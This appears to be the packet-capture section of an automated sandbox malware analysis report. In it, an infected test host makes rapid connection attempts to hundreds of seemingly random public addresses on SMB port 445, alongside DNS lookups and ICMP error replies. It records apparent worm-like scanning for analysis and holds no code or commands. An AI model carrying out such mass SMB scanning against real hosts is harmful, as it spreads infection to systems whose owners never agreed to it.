                  Oct 13, 2022 14:55:07.805530071 CEST52997445192.168.2.414.72.71.186
                  Oct 13, 2022 14:55:07.805560112 CEST52998445192.168.2.4117.128.76.19
                  Oct 13, 2022 14:55:07.820534945 CEST52999445192.168.2.478.66.190.167
                  Oct 13, 2022 14:55:07.823076010 CEST53018445192.168.2.4173.199.48.128
                  Oct 13, 2022 14:55:07.823503017 CEST53020445192.168.2.4177.240.218.164
                  Oct 13, 2022 14:55:07.823667049 CEST53021445192.168.2.4167.119.100.251
                  Oct 13, 2022 14:55:07.824167967 CEST53025445192.168.2.4193.141.226.252
                  Oct 13, 2022 14:55:07.824351072 CEST53026445192.168.2.4158.113.115.224
                  Oct 13, 2022 14:55:07.824508905 CEST53027445192.168.2.410.96.21.240
                  Oct 13, 2022 14:55:07.824800968 CEST53029445192.168.2.431.119.62.130
                  Oct 13, 2022 14:55:07.825005054 CEST53030445192.168.2.4144.156.230.166
                  Oct 13, 2022 14:55:07.825176954 CEST53031445192.168.2.437.130.180.189
                  Oct 13, 2022 14:55:07.825365067 CEST53032445192.168.2.475.215.47.221
                  Oct 13, 2022 14:55:07.825526953 CEST53033445192.168.2.4165.17.221.87
                  Oct 13, 2022 14:55:07.825700998 CEST53034445192.168.2.4143.32.249.43
                  Oct 13, 2022 14:55:07.825851917 CEST53035445192.168.2.4113.139.86.76
                  Oct 13, 2022 14:55:07.826033115 CEST53036445192.168.2.4156.250.21.97
                  Oct 13, 2022 14:55:07.826179981 CEST53037445192.168.2.492.19.2.75
                  Oct 13, 2022 14:55:07.826353073 CEST53038445192.168.2.4153.144.42.229
                  Oct 13, 2022 14:55:07.826531887 CEST53039445192.168.2.4187.18.250.184
                  Oct 13, 2022 14:55:07.826690912 CEST53040445192.168.2.447.243.22.6
                  Oct 13, 2022 14:55:07.827404022 CEST53041445192.168.2.417.52.211.26
                  Oct 13, 2022 14:55:07.828113079 CEST53042445192.168.2.4163.202.129.51
                  Oct 13, 2022 14:55:07.828819990 CEST53043445192.168.2.4140.114.40.157
                  Oct 13, 2022 14:55:07.852413893 CEST44553025193.141.226.252192.168.2.4
                  Oct 13, 2022 14:55:08.368109941 CEST53025445192.168.2.4193.141.226.252
                  Oct 13, 2022 14:55:08.396236897 CEST44553025193.141.226.252192.168.2.4
                  Oct 13, 2022 14:55:08.907798052 CEST53046445192.168.2.4197.36.231.1
                  Oct 13, 2022 14:55:08.924674034 CEST53047445192.168.2.4101.226.0.168
                  Oct 13, 2022 14:55:08.925348997 CEST53048445192.168.2.4197.18.51.76
                  Oct 13, 2022 14:55:08.925585985 CEST53049445192.168.2.4109.231.204.59
                  Oct 13, 2022 14:55:08.925719023 CEST53050445192.168.2.418.89.231.191
                  Oct 13, 2022 14:55:08.925966978 CEST53052445192.168.2.4108.135.173.217
                  Oct 13, 2022 14:55:08.926099062 CEST53053445192.168.2.480.87.215.1
                  Oct 13, 2022 14:55:08.926214933 CEST53054445192.168.2.4221.145.248.178
                  Oct 13, 2022 14:55:08.926362038 CEST53055445192.168.2.416.137.228.39
                  Oct 13, 2022 14:55:08.940675974 CEST53058445192.168.2.4195.21.205.174
                  Oct 13, 2022 14:55:08.941818953 CEST53059445192.168.2.4190.46.26.226
                  Oct 13, 2022 14:55:08.942894936 CEST53060445192.168.2.4137.132.26.127
                  Oct 13, 2022 14:55:08.943146944 CEST53061445192.168.2.4182.144.203.49
                  Oct 13, 2022 14:55:08.943320036 CEST53062445192.168.2.4189.123.92.114
                  Oct 13, 2022 14:55:08.943481922 CEST53063445192.168.2.485.217.66.188
                  Oct 13, 2022 14:55:08.943639040 CEST53064445192.168.2.4205.209.103.145
                  Oct 13, 2022 14:55:08.943809986 CEST53065445192.168.2.445.6.147.9
                  Oct 13, 2022 14:55:08.943969011 CEST53066445192.168.2.4105.179.246.84
                  Oct 13, 2022 14:55:08.944103003 CEST53067445192.168.2.41.1.102.179
                  Oct 13, 2022 14:55:08.944242001 CEST53068445192.168.2.492.251.180.65
                  Oct 13, 2022 14:55:08.944367886 CEST53069445192.168.2.415.50.144.80
                  Oct 13, 2022 14:55:08.944515944 CEST53070445192.168.2.4212.126.46.187
                  Oct 13, 2022 14:55:08.944674015 CEST53071445192.168.2.428.202.175.254
                  Oct 13, 2022 14:55:08.944829941 CEST53072445192.168.2.4102.130.10.44
                  Oct 13, 2022 14:55:08.945103884 CEST53074445192.168.2.4203.99.155.115
                  Oct 13, 2022 14:55:08.945269108 CEST53075445192.168.2.4211.52.100.6
                  Oct 13, 2022 14:55:08.945424080 CEST53076445192.168.2.4106.199.47.73
                  Oct 13, 2022 14:55:08.945586920 CEST53077445192.168.2.467.1.60.182
                  Oct 13, 2022 14:55:08.946003914 CEST53080445192.168.2.4178.36.113.185
                  Oct 13, 2022 14:55:08.946178913 CEST53081445192.168.2.453.16.32.131
                  Oct 13, 2022 14:55:08.946949005 CEST53083445192.168.2.4165.28.173.195
                  Oct 13, 2022 14:55:08.949861050 CEST53102445192.168.2.456.142.184.12
                  Oct 13, 2022 14:55:09.178365946 CEST4455306545.6.147.9192.168.2.4
                  Oct 13, 2022 14:55:09.799889088 CEST53065445192.168.2.445.6.147.9
                  Oct 13, 2022 14:55:10.021548033 CEST53105445192.168.2.4135.128.171.139
                  Oct 13, 2022 14:55:10.035335064 CEST4455306545.6.147.9192.168.2.4
                  Oct 13, 2022 14:55:10.037754059 CEST53108445192.168.2.4109.66.218.174
                  Oct 13, 2022 14:55:10.037897110 CEST53109445192.168.2.466.244.167.9
                  Oct 13, 2022 14:55:10.038014889 CEST53110445192.168.2.498.184.99.109
                  Oct 13, 2022 14:55:10.038378954 CEST53111445192.168.2.4194.164.54.62
                  Oct 13, 2022 14:55:10.038589954 CEST53113445192.168.2.4206.140.232.218
                  Oct 13, 2022 14:55:10.038691998 CEST53114445192.168.2.425.248.134.141
                  Oct 13, 2022 14:55:10.039376974 CEST53115445192.168.2.4170.219.73.113
                  Oct 13, 2022 14:55:10.040117979 CEST53116445192.168.2.499.213.225.87
                  Oct 13, 2022 14:55:10.061990976 CEST53136445192.168.2.4105.234.0.45
                  Oct 13, 2022 14:55:10.062041998 CEST53137445192.168.2.4136.180.13.38
                  Oct 13, 2022 14:55:10.062201977 CEST53140445192.168.2.4170.58.194.138
                  Oct 13, 2022 14:55:10.062402964 CEST53141445192.168.2.449.160.246.48
                  Oct 13, 2022 14:55:10.062422991 CEST53142445192.168.2.4101.123.66.121
                  Oct 13, 2022 14:55:10.062592030 CEST53143445192.168.2.483.196.198.179
                  Oct 13, 2022 14:55:10.062714100 CEST53145445192.168.2.4164.124.229.177
                  Oct 13, 2022 14:55:10.062866926 CEST53146445192.168.2.441.176.193.111
                  Oct 13, 2022 14:55:10.062866926 CEST53148445192.168.2.4158.209.90.9
                  Oct 13, 2022 14:55:10.062886000 CEST53147445192.168.2.4209.144.119.190
                  Oct 13, 2022 14:55:10.063003063 CEST53149445192.168.2.4126.123.129.181
                  Oct 13, 2022 14:55:10.063028097 CEST53150445192.168.2.4156.154.167.44
                  Oct 13, 2022 14:55:10.063134909 CEST53151445192.168.2.4195.38.200.232
                  Oct 13, 2022 14:55:10.063256025 CEST53152445192.168.2.4161.44.132.201
                  Oct 13, 2022 14:55:10.063328981 CEST53153445192.168.2.481.38.49.130
                  Oct 13, 2022 14:55:10.063441038 CEST53154445192.168.2.4187.216.219.199
                  Oct 13, 2022 14:55:10.063458920 CEST53155445192.168.2.495.232.242.157
                  Oct 13, 2022 14:55:10.063585043 CEST53156445192.168.2.49.175.157.104
                  Oct 13, 2022 14:55:10.065804005 CEST53157445192.168.2.473.127.226.170
                  Oct 13, 2022 14:55:10.065936089 CEST53158445192.168.2.4145.216.67.244
                  Oct 13, 2022 14:55:10.066070080 CEST53159445192.168.2.4101.18.46.29
                  Oct 13, 2022 14:55:10.066077948 CEST53160445192.168.2.4168.70.205.224
                  Oct 13, 2022 14:55:10.066154003 CEST53161445192.168.2.489.77.167.193
                  Oct 13, 2022 14:55:11.155165911 CEST53165445192.168.2.4186.157.253.62
                  Oct 13, 2022 14:55:11.155926943 CEST53169445192.168.2.436.179.252.157
                  Oct 13, 2022 14:55:11.155978918 CEST53170445192.168.2.4210.254.117.238
                  Oct 13, 2022 14:55:11.156116009 CEST53171445192.168.2.414.42.68.206
                  Oct 13, 2022 14:55:11.156311035 CEST53173445192.168.2.424.107.87.157
                  Oct 13, 2022 14:55:11.156455994 CEST53174445192.168.2.4107.128.101.26
                  Oct 13, 2022 14:55:11.157164097 CEST53175445192.168.2.4217.204.126.165
                  Oct 13, 2022 14:55:11.157424927 CEST53176445192.168.2.439.32.79.161
                  Oct 13, 2022 14:55:11.162564039 CEST53177445192.168.2.4101.252.55.95
                  Oct 13, 2022 14:55:11.163539886 CEST53178445192.168.2.4107.187.2.195
                  Oct 13, 2022 14:55:11.164407015 CEST53179445192.168.2.4135.71.64.252
                  Oct 13, 2022 14:55:11.165303946 CEST53180445192.168.2.4116.42.193.38
                  Oct 13, 2022 14:55:11.168390989 CEST53199445192.168.2.4182.253.142.209
                  Oct 13, 2022 14:55:11.168657064 CEST53200445192.168.2.489.197.234.161
                  Oct 13, 2022 14:55:11.168872118 CEST53201445192.168.2.4214.203.211.96
                  Oct 13, 2022 14:55:11.169493914 CEST53204445192.168.2.4175.2.157.47
                  Oct 13, 2022 14:55:11.169645071 CEST53205445192.168.2.441.78.64.145
                  Oct 13, 2022 14:55:11.169855118 CEST53206445192.168.2.428.248.226.221
                  Oct 13, 2022 14:55:11.170228004 CEST53208445192.168.2.4153.194.64.201
                  Oct 13, 2022 14:55:11.170476913 CEST53209445192.168.2.4130.229.57.64
                  Oct 13, 2022 14:55:11.170752048 CEST53210445192.168.2.4124.44.102.140
                  Oct 13, 2022 14:55:11.171029091 CEST53211445192.168.2.493.36.145.62
                  Oct 13, 2022 14:55:11.171360016 CEST53212445192.168.2.449.125.133.64
                  Oct 13, 2022 14:55:11.171566963 CEST53213445192.168.2.4194.186.35.204
                  Oct 13, 2022 14:55:11.171780109 CEST53214445192.168.2.4173.20.230.31
                  Oct 13, 2022 14:55:11.171942949 CEST53215445192.168.2.464.253.154.64
                  Oct 13, 2022 14:55:11.172089100 CEST53216445192.168.2.426.73.30.232
                  Oct 13, 2022 14:55:11.172219992 CEST53217445192.168.2.4101.115.171.196
                  Oct 13, 2022 14:55:11.172343969 CEST53218445192.168.2.4222.105.39.85
                  Oct 13, 2022 14:55:11.172610998 CEST53219445192.168.2.4214.199.230.46
                  Oct 13, 2022 14:55:11.173465967 CEST53220445192.168.2.4174.209.162.106
                  Oct 13, 2022 14:55:11.232603073 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:55:12.271480083 CEST53225445192.168.2.426.187.114.130
                  Oct 13, 2022 14:55:12.271687031 CEST53226445192.168.2.448.110.143.38
                  Oct 13, 2022 14:55:12.271800041 CEST53227445192.168.2.455.7.147.177
                  Oct 13, 2022 14:55:12.272088051 CEST53228445192.168.2.4220.7.93.198
                  Oct 13, 2022 14:55:12.272130966 CEST53229445192.168.2.4151.242.85.205
                  Oct 13, 2022 14:55:12.273129940 CEST53248445192.168.2.432.206.175.113
                  Oct 13, 2022 14:55:12.273277044 CEST53249445192.168.2.418.54.8.142
                  Oct 13, 2022 14:55:12.273292065 CEST53250445192.168.2.4215.77.55.112
                  Oct 13, 2022 14:55:12.273564100 CEST53254445192.168.2.4179.241.171.158
                  Oct 13, 2022 14:55:12.273608923 CEST53255445192.168.2.415.102.114.136
                  Oct 13, 2022 14:55:12.273806095 CEST53257445192.168.2.4207.37.140.58
                  Oct 13, 2022 14:55:12.273885012 CEST53258445192.168.2.414.65.202.202
                  Oct 13, 2022 14:55:12.273962975 CEST53259445192.168.2.4142.210.3.203
                  Oct 13, 2022 14:55:12.273994923 CEST53260445192.168.2.448.210.206.243
                  Oct 13, 2022 14:55:12.274096012 CEST53261445192.168.2.482.62.99.159
                  Oct 13, 2022 14:55:12.274118900 CEST53262445192.168.2.4209.219.11.199
                  Oct 13, 2022 14:55:12.274245024 CEST53264445192.168.2.455.106.97.180
                  Oct 13, 2022 14:55:12.274256945 CEST53263445192.168.2.4174.112.169.142
                  Oct 13, 2022 14:55:12.274360895 CEST53265445192.168.2.457.208.19.31
                  Oct 13, 2022 14:55:12.274405003 CEST53266445192.168.2.415.226.141.13
                  Oct 13, 2022 14:55:12.274538994 CEST53267445192.168.2.432.13.89.124
                  Oct 13, 2022 14:55:12.274564028 CEST53268445192.168.2.455.57.215.72
                  Oct 13, 2022 14:55:12.274914980 CEST53271445192.168.2.4169.10.91.53
                  Oct 13, 2022 14:55:12.275007963 CEST53273445192.168.2.496.172.112.202
                  Oct 13, 2022 14:55:12.275090933 CEST53274445192.168.2.496.219.19.111
                  Oct 13, 2022 14:55:12.275124073 CEST53275445192.168.2.4105.94.116.139
                  Oct 13, 2022 14:55:12.275250912 CEST53277445192.168.2.440.192.216.1
                  Oct 13, 2022 14:55:12.275269985 CEST53276445192.168.2.4122.140.63.71
                  Oct 13, 2022 14:55:12.275535107 CEST53280445192.168.2.430.89.2.26
                  Oct 13, 2022 14:55:12.275578976 CEST53279445192.168.2.468.170.124.210
                  Oct 13, 2022 14:55:12.275855064 CEST53281445192.168.2.46.242.239.50
                  Oct 13, 2022 14:55:13.380980968 CEST53286445192.168.2.4132.210.128.106
                  Oct 13, 2022 14:55:13.381341934 CEST53287445192.168.2.462.163.104.203
                  Oct 13, 2022 14:55:13.381695032 CEST53289445192.168.2.428.97.55.88
                  Oct 13, 2022 14:55:13.381695032 CEST53288445192.168.2.4180.136.251.20
                  Oct 13, 2022 14:55:13.381705046 CEST53290445192.168.2.4146.22.73.55
                  Oct 13, 2022 14:55:13.382746935 CEST53309445192.168.2.426.96.41.130
                  Oct 13, 2022 14:55:13.382911921 CEST53310445192.168.2.4184.212.29.60
                  Oct 13, 2022 14:55:13.383018970 CEST53311445192.168.2.417.42.128.149
                  Oct 13, 2022 14:55:13.383234024 CEST53314445192.168.2.48.51.114.5
                  Oct 13, 2022 14:55:13.383325100 CEST53315445192.168.2.4220.151.138.156
                  Oct 13, 2022 14:55:13.383375883 CEST53316445192.168.2.431.82.63.144
                  Oct 13, 2022 14:55:13.383500099 CEST53318445192.168.2.4210.181.67.151
                  Oct 13, 2022 14:55:13.383586884 CEST53319445192.168.2.4163.73.138.131
                  Oct 13, 2022 14:55:13.383641958 CEST53320445192.168.2.4198.168.196.130
                  Oct 13, 2022 14:55:13.383761883 CEST53321445192.168.2.4150.140.136.180
                  Oct 13, 2022 14:55:13.383881092 CEST53322445192.168.2.4144.186.208.103
                  Oct 13, 2022 14:55:13.383912086 CEST53323445192.168.2.4110.222.58.68
                  Oct 13, 2022 14:55:13.384038925 CEST53324445192.168.2.486.209.188.211
                  Oct 13, 2022 14:55:13.384166002 CEST53325445192.168.2.480.5.149.197
                  Oct 13, 2022 14:55:13.384170055 CEST53326445192.168.2.4109.172.225.112
                  Oct 13, 2022 14:55:13.384306908 CEST53327445192.168.2.494.143.4.77
                  Oct 13, 2022 14:55:13.384341002 CEST53328445192.168.2.4193.177.213.186
                  Oct 13, 2022 14:55:13.384459972 CEST53329445192.168.2.447.37.169.141
                  Oct 13, 2022 14:55:13.384788036 CEST53333445192.168.2.433.144.254.24
                  Oct 13, 2022 14:55:13.384919882 CEST53334445192.168.2.4168.89.129.14
                  Oct 13, 2022 14:55:13.384990931 CEST53335445192.168.2.445.47.164.33
                  Oct 13, 2022 14:55:13.385042906 CEST53336445192.168.2.421.179.166.5
                  Oct 13, 2022 14:55:13.385184050 CEST53337445192.168.2.4162.147.225.54
                  Oct 13, 2022 14:55:13.385266066 CEST53338445192.168.2.45.37.55.5
                  Oct 13, 2022 14:55:13.385462046 CEST53340445192.168.2.4218.5.194.114
                  Oct 13, 2022 14:55:13.385653973 CEST53341445192.168.2.4189.97.134.119
                  Oct 13, 2022 14:55:13.385791063 CEST53342445192.168.2.4192.218.94.84
                  Oct 13, 2022 14:55:13.679444075 CEST44553341189.97.134.119192.168.2.4
                  Oct 13, 2022 14:55:14.193201065 CEST53341445192.168.2.4189.97.134.119
                  Oct 13, 2022 14:55:14.479501963 CEST44553341189.97.134.119192.168.2.4
                  Oct 13, 2022 14:55:14.490468979 CEST53347445192.168.2.4211.148.228.164
                  Oct 13, 2022 14:55:14.490926027 CEST53348445192.168.2.440.248.237.184
                  Oct 13, 2022 14:55:14.491108894 CEST53349445192.168.2.4181.179.166.143
                  Oct 13, 2022 14:55:14.491254091 CEST53350445192.168.2.414.138.65.159
                  Oct 13, 2022 14:55:14.491432905 CEST53351445192.168.2.4211.81.8.169
                  Oct 13, 2022 14:55:14.492822886 CEST53370445192.168.2.488.219.27.58
                  Oct 13, 2022 14:55:14.492983103 CEST53371445192.168.2.4201.98.159.174
                  Oct 13, 2022 14:55:14.493196964 CEST53372445192.168.2.4111.240.155.232
                  Oct 13, 2022 14:55:14.493371964 CEST53374445192.168.2.421.58.33.168
                  Oct 13, 2022 14:55:14.493480921 CEST53376445192.168.2.4121.157.180.66
                  Oct 13, 2022 14:55:14.493529081 CEST53377445192.168.2.4103.215.214.143
                  Oct 13, 2022 14:55:14.493686914 CEST53379445192.168.2.4198.98.219.99
                  Oct 13, 2022 14:55:14.493839025 CEST53381445192.168.2.434.36.209.109
                  Oct 13, 2022 14:55:14.493839979 CEST53380445192.168.2.4217.225.236.247
                  Oct 13, 2022 14:55:14.493977070 CEST53383445192.168.2.491.93.31.134
                  Oct 13, 2022 14:55:14.493982077 CEST53382445192.168.2.44.183.99.31
                  Oct 13, 2022 14:55:14.493999958 CEST53384445192.168.2.449.120.154.244
                  Oct 13, 2022 14:55:14.494128942 CEST53385445192.168.2.439.233.120.185
                  Oct 13, 2022 14:55:14.494138956 CEST53386445192.168.2.440.229.32.135
                  Oct 13, 2022 14:55:14.494285107 CEST53387445192.168.2.46.27.4.224
                  Oct 13, 2022 14:55:14.494294882 CEST53388445192.168.2.4201.134.174.154
                  Oct 13, 2022 14:55:14.494438887 CEST53390445192.168.2.458.185.189.126
                  Oct 13, 2022 14:55:14.494462967 CEST53389445192.168.2.4179.238.197.74
                  Oct 13, 2022 14:55:14.494784117 CEST53395445192.168.2.430.190.240.56
                  Oct 13, 2022 14:55:14.494930983 CEST53396445192.168.2.4197.63.18.64
                  Oct 13, 2022 14:55:14.494934082 CEST53394445192.168.2.4217.160.116.154
                  Oct 13, 2022 14:55:14.494962931 CEST53397445192.168.2.4156.177.122.0
                  Oct 13, 2022 14:55:14.495111942 CEST53398445192.168.2.49.170.148.129
                  Oct 13, 2022 14:55:14.495140076 CEST53399445192.168.2.460.117.186.107
                  Oct 13, 2022 14:55:14.495279074 CEST53401445192.168.2.43.241.135.212
                  Oct 13, 2022 14:55:14.495330095 CEST53402445192.168.2.472.138.175.194
                  Oct 13, 2022 14:55:14.495433092 CEST53403445192.168.2.4216.141.10.27
                  Oct 13, 2022 14:55:14.796349049 CEST4455339960.117.186.107192.168.2.4
                  Oct 13, 2022 14:55:15.302735090 CEST53399445192.168.2.460.117.186.107
                  Oct 13, 2022 14:55:15.601667881 CEST4455339960.117.186.107192.168.2.4
                  Oct 13, 2022 14:55:15.615628958 CEST53410445192.168.2.4133.247.220.90
                  Oct 13, 2022 14:55:15.615628958 CEST53409445192.168.2.44.211.226.97
                  Oct 13, 2022 14:55:15.615874052 CEST53413445192.168.2.4203.79.194.8
                  Oct 13, 2022 14:55:15.615883112 CEST53411445192.168.2.496.28.151.34
                  Oct 13, 2022 14:55:15.616621971 CEST53415445192.168.2.4146.128.166.7
                  Oct 13, 2022 14:55:15.616622925 CEST53431445192.168.2.4175.169.195.162
                  Oct 13, 2022 14:55:15.616725922 CEST53433445192.168.2.4165.185.68.231
                  Oct 13, 2022 14:55:15.616725922 CEST53434445192.168.2.4155.54.137.143
                  Oct 13, 2022 14:55:15.616940022 CEST53438445192.168.2.4186.85.55.18
                  Oct 13, 2022 14:55:15.617070913 CEST53437445192.168.2.455.187.167.19
                  Oct 13, 2022 14:55:15.617072105 CEST53439445192.168.2.412.84.27.11
                  Oct 13, 2022 14:55:15.617072105 CEST53440445192.168.2.472.39.24.50
                  Oct 13, 2022 14:55:15.617222071 CEST53442445192.168.2.461.75.140.158
                  Oct 13, 2022 14:55:15.617232084 CEST53443445192.168.2.45.134.4.132
                  Oct 13, 2022 14:55:15.617333889 CEST53445445192.168.2.455.167.132.184
                  Oct 13, 2022 14:55:15.617428064 CEST53444445192.168.2.4200.231.58.179
                  Oct 13, 2022 14:55:15.617428064 CEST53446445192.168.2.4113.127.206.30
                  Oct 13, 2022 14:55:15.617552042 CEST53448445192.168.2.471.53.90.113
                  Oct 13, 2022 14:55:15.617554903 CEST53447445192.168.2.4184.209.116.150
                  Oct 13, 2022 14:55:15.617670059 CEST53450445192.168.2.462.137.16.44
                  Oct 13, 2022 14:55:15.617676020 CEST53449445192.168.2.4176.235.196.40
                  Oct 13, 2022 14:55:15.617809057 CEST53451445192.168.2.472.210.43.173
                  Oct 13, 2022 14:55:15.617813110 CEST53453445192.168.2.437.147.146.165
                  Oct 13, 2022 14:55:15.618016958 CEST53457445192.168.2.438.23.201.7
                  Oct 13, 2022 14:55:15.618016958 CEST53454445192.168.2.4152.137.86.65
                  Oct 13, 2022 14:55:15.618149042 CEST53458445192.168.2.488.245.119.44
                  Oct 13, 2022 14:55:15.618148088 CEST53459445192.168.2.448.114.219.44
                  Oct 13, 2022 14:55:15.618268967 CEST53462445192.168.2.4101.202.128.42
                  Oct 13, 2022 14:55:15.618283033 CEST53460445192.168.2.45.121.12.245
                  Oct 13, 2022 14:55:15.618392944 CEST53463445192.168.2.422.0.253.211
                  Oct 13, 2022 14:55:15.618402958 CEST53464445192.168.2.483.122.65.21
                  Oct 13, 2022 14:55:15.619072914 CEST53465445192.168.2.427.125.116.137
                  Oct 13, 2022 14:55:16.740734100 CEST53472445192.168.2.442.60.14.115
                  Oct 13, 2022 14:55:16.740746975 CEST53474445192.168.2.4181.77.169.174
                  Oct 13, 2022 14:55:16.740833044 CEST53475445192.168.2.4220.4.27.186
                  Oct 13, 2022 14:55:16.740866899 CEST53476445192.168.2.4112.216.249.155
                  Oct 13, 2022 14:55:16.741070032 CEST53480445192.168.2.488.199.44.132
                  Oct 13, 2022 14:55:16.741699934 CEST53496445192.168.2.4213.89.220.249
                  Oct 13, 2022 14:55:16.741847992 CEST53495445192.168.2.424.89.114.42
                  Oct 13, 2022 14:55:16.741852999 CEST53498445192.168.2.432.95.149.168
                  Oct 13, 2022 14:55:16.741908073 CEST53499445192.168.2.4206.38.192.234
                  Oct 13, 2022 14:55:16.741939068 CEST53501445192.168.2.450.7.224.52
                  Oct 13, 2022 14:55:16.742037058 CEST53502445192.168.2.425.94.178.220
                  Oct 13, 2022 14:55:16.742099047 CEST53503445192.168.2.4158.236.108.181
                  Oct 13, 2022 14:55:16.742202044 CEST53505445192.168.2.4135.118.223.41
                  Oct 13, 2022 14:55:16.742245913 CEST53506445192.168.2.471.71.251.127
                  Oct 13, 2022 14:55:16.742274046 CEST53507445192.168.2.455.37.49.126
                  Oct 13, 2022 14:55:16.742363930 CEST53508445192.168.2.4190.215.195.239
                  Oct 13, 2022 14:55:16.742403030 CEST53509445192.168.2.4196.205.38.193
                  Oct 13, 2022 14:55:16.742465973 CEST53510445192.168.2.424.158.205.240
                  Oct 13, 2022 14:55:16.742535114 CEST53512445192.168.2.477.202.111.244
                  Oct 13, 2022 14:55:16.742547035 CEST53511445192.168.2.439.66.121.66
                  Oct 13, 2022 14:55:16.742650986 CEST53513445192.168.2.4201.33.79.96
                  Oct 13, 2022 14:55:16.742701054 CEST53514445192.168.2.4161.229.187.50
                  Oct 13, 2022 14:55:16.742743969 CEST53515445192.168.2.497.56.13.157
                  Oct 13, 2022 14:55:16.742832899 CEST53516445192.168.2.4163.118.199.66
                  Oct 13, 2022 14:55:16.743042946 CEST53520445192.168.2.452.84.130.171
                  Oct 13, 2022 14:55:16.743058920 CEST53521445192.168.2.498.1.111.110
                  Oct 13, 2022 14:55:16.743086100 CEST53522445192.168.2.4154.166.48.29
                  Oct 13, 2022 14:55:16.743189096 CEST53523445192.168.2.450.94.33.210
                  Oct 13, 2022 14:55:16.743217945 CEST53524445192.168.2.4213.115.174.247
                  Oct 13, 2022 14:55:16.743319988 CEST53526445192.168.2.4162.174.123.67
                  Oct 13, 2022 14:55:16.743395090 CEST53527445192.168.2.436.218.242.12
                  Oct 13, 2022 14:55:16.743410110 CEST53528445192.168.2.452.25.157.3
                  Oct 13, 2022 14:55:17.850136995 CEST53536445192.168.2.4211.38.107.62
                  Oct 13, 2022 14:55:17.850500107 CEST53537445192.168.2.464.175.74.18
                  Oct 13, 2022 14:55:17.850550890 CEST53538445192.168.2.4206.177.253.210
                  Oct 13, 2022 14:55:17.850667953 CEST53539445192.168.2.414.210.128.53
                  Oct 13, 2022 14:55:17.851476908 CEST53542445192.168.2.483.50.4.157
                  Oct 13, 2022 14:55:17.851476908 CEST53543445192.168.2.473.100.76.182
                  Oct 13, 2022 14:55:17.851531982 CEST53546445192.168.2.494.254.55.204
                  Oct 13, 2022 14:55:17.852113962 CEST53552445192.168.2.499.66.107.11
                  Oct 13, 2022 14:55:17.852502108 CEST53559445192.168.2.4171.41.225.204
                  Oct 13, 2022 14:55:17.852646112 CEST53562445192.168.2.460.6.28.234
                  Oct 13, 2022 14:55:17.852936029 CEST53567445192.168.2.474.209.24.9
                  Oct 13, 2022 14:55:17.853003979 CEST53568445192.168.2.4100.79.131.233
                  Oct 13, 2022 14:55:17.853080988 CEST53569445192.168.2.421.181.221.166
                  Oct 13, 2022 14:55:17.853183031 CEST53570445192.168.2.4179.129.214.241
                  Oct 13, 2022 14:55:17.853216887 CEST53571445192.168.2.4172.184.28.43
                  Oct 13, 2022 14:55:17.853368998 CEST53573445192.168.2.425.33.108.135
                  Oct 13, 2022 14:55:17.853444099 CEST53565445192.168.2.455.169.249.155
                  Oct 13, 2022 14:55:17.853445053 CEST53572445192.168.2.424.105.231.156
                  Oct 13, 2022 14:55:17.853476048 CEST53574445192.168.2.432.92.79.51
                  Oct 13, 2022 14:55:17.853631020 CEST53575445192.168.2.484.232.133.244
                  Oct 13, 2022 14:55:17.853658915 CEST53576445192.168.2.4207.233.79.28
                  Oct 13, 2022 14:55:17.853862047 CEST53578445192.168.2.4134.18.254.159
                  Oct 13, 2022 14:55:17.853900909 CEST53579445192.168.2.435.83.57.163
                  Oct 13, 2022 14:55:17.854161024 CEST53577445192.168.2.4204.119.129.215
                  Oct 13, 2022 14:55:17.854161024 CEST53583445192.168.2.437.21.50.138
                  Oct 13, 2022 14:55:17.854299068 CEST53584445192.168.2.4111.9.119.151
                  Oct 13, 2022 14:55:17.854307890 CEST53585445192.168.2.42.215.115.229
                  Oct 13, 2022 14:55:17.854480028 CEST53586445192.168.2.448.235.0.108
                  Oct 13, 2022 14:55:17.854497910 CEST53587445192.168.2.454.82.22.10
                  Oct 13, 2022 14:55:17.854602098 CEST53588445192.168.2.4119.41.189.217
                  Oct 13, 2022 14:55:17.854732990 CEST53590445192.168.2.4174.1.54.123
                  Oct 13, 2022 14:55:17.854862928 CEST53591445192.168.2.4151.77.3.199
                  Oct 13, 2022 14:55:18.157032967 CEST44553570179.129.214.241192.168.2.4
                  Oct 13, 2022 14:55:18.662388086 CEST53570445192.168.2.4179.129.214.241
                  Oct 13, 2022 14:55:18.930932999 CEST44553570179.129.214.241192.168.2.4
                  Oct 13, 2022 14:55:19.443696976 CEST53570445192.168.2.4179.129.214.241
                  Oct 13, 2022 14:55:19.749169111 CEST44553570179.129.214.241192.168.2.4
                  Oct 13, 2022 14:55:20.649641037 CEST44553474181.77.169.174192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 13, 2022 14:53:07.238750935 CEST5657253192.168.2.48.8.8.8
                  Oct 13, 2022 14:53:07.409671068 CEST53565728.8.8.8192.168.2.4
                  Oct 13, 2022 14:53:07.863650084 CEST5091153192.168.2.48.8.8.8
                  Oct 13, 2022 14:53:07.883070946 CEST53509118.8.8.8192.168.2.4
                  Oct 13, 2022 14:53:08.730650902 CEST5968353192.168.2.48.8.8.8
                  Oct 13, 2022 14:53:08.901892900 CEST53596838.8.8.8192.168.2.4
                  Oct 13, 2022 14:53:09.369277954 CEST6416753192.168.2.48.8.8.8
                  Oct 13, 2022 14:53:09.391482115 CEST53641678.8.8.8192.168.2.4
                  Oct 13, 2022 14:54:00.244787931 CEST138138192.168.2.4192.168.2.255

                  ICMP Packets

                  TimestampSource IPDest IPChecksumCodeType
                  Oct 13, 2022 14:53:21.462387085 CEST209.117.102.182192.168.2.4e0cd(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:53:25.557653904 CEST172.16.1.1192.168.2.410e9(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:53:30.903446913 CEST87.169.67.225192.168.2.429e(Unknown)Destination Unreachable
                  Oct 13, 2022 14:53:31.053589106 CEST188.115.22.166192.168.2.45ef9(Unknown)Destination Unreachable
                  Oct 13, 2022 14:53:31.925228119 CEST5.1.107.138192.168.2.42fef(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:53:50.100446939 CEST95.33.214.235192.168.2.459(Unknown)Destination Unreachable
                  Oct 13, 2022 14:53:55.929841995 CEST1.173.32.254192.168.2.4fab9(Unknown)Destination Unreachable
                  Oct 13, 2022 14:53:56.979298115 CEST105.187.234.189192.168.2.4f23(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:53:58.921186924 CEST170.233.25.34192.168.2.483d2(Host unreachable)Destination Unreachable
